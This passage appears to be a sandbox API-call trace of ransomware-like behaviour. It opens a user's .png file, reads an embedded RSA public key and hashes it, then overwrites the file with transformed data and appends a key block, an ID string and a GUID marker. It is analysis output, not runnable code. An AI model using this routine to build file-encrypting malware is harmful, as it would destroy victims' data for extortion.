(lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\tE1LWlZl-CqVZeW gL\\Gpf_fTIy87TJO1Dp27TE.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\te1lwlzl-cqvzew gl\\gpf_ftiy87tjo1dp27te.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.882] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=20290) returned 1 [0193.882] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.885] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4f1c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.885] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.888] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.888] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x4f42, lpOverlapped=0x0) returned 1 [0193.890] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.890] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.890] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.890] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.892] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.892] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.892] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.892] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.892] GetLastError () returned 0x0 [0193.892] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.892] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.893] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.893] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.893] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4f40) returned 0x2d49778 [0193.893] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d421d8 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f40 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42220 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f58 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.895] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fa0 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39f88 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0193.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.899] GetCurrentThreadId () returned 0x264 [0193.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46000 [0193.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.899] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.900] GetCurrentThreadId () returned 0x264 [0193.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0193.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0193.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0193.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fa0 [0193.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f70 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a000 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a018 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fb8 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f88 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f88 | out: hHeap=0x6a0000) returned 1 [0193.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42220 | out: hHeap=0x6a0000) returned 1 [0193.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.911] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x4f3d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x4f3d, lpOverlapped=0x0) returned 1 [0193.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.911] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4f42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.911] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.915] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.915] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.915] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, 